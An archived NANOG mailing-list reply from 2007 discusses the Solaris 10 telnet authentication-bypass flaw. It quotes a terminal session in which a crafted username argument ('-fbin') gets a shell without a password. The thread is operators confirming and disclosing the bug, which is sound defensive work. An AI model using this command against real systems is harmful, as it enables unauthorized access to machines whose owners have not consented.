[94846] in North American Network Operators' Group


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: Solaris 10 Telnet Exploit

daemon@ATHENA.MIT.EDU (Gadi Evron)
Sun Feb 11 22:51:39 2007

Date: Sun, 11 Feb 2007 21:47:37 -0600 (CST)
From: Gadi Evron <ge@linuxbox.org>
To: William Schultz <wschultz@bsdboy.com>
Cc: nanog@merit.edu
In-Reply-To: <A8780059-AE19-4ED7-AB95-BDCB262E4C22@bsdboy.com>
Errors-To: owner-nanog@merit.edu


On Sun, 11 Feb 2007, William Schultz wrote:
> 
> http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day- 
> disable.html
> 
> Tested on Sol10, and it indeed works... Good thing we use SSH, right?!

It works.
Credit to Johannes Ullrich at the SANS ISC.

I believe the vulnerability is that it is running telnet bu default.


> 
> ################################
> iWil:~ wschultz$ telnet -l "-fbin" dns1
> Trying A.B.C.D...
> Connected to dns1.my.com.
> Escape character is '^]'.
> Last login: Sun Feb 11 18:11:05 from A.B.C.D
> Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
> $ id
> uid=2(bin) gid=2(bin)
> $
> ################################
>


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[94846] in North American Network Operators' Group

Re: Solaris 10 Telnet Exploit

daemon@ATHENA.MIT.EDU (Gadi Evron)Sun Feb 11 22:51:39 2007

daemon@ATHENA.MIT.EDU (Gadi Evron)
Sun Feb 11 22:51:39 2007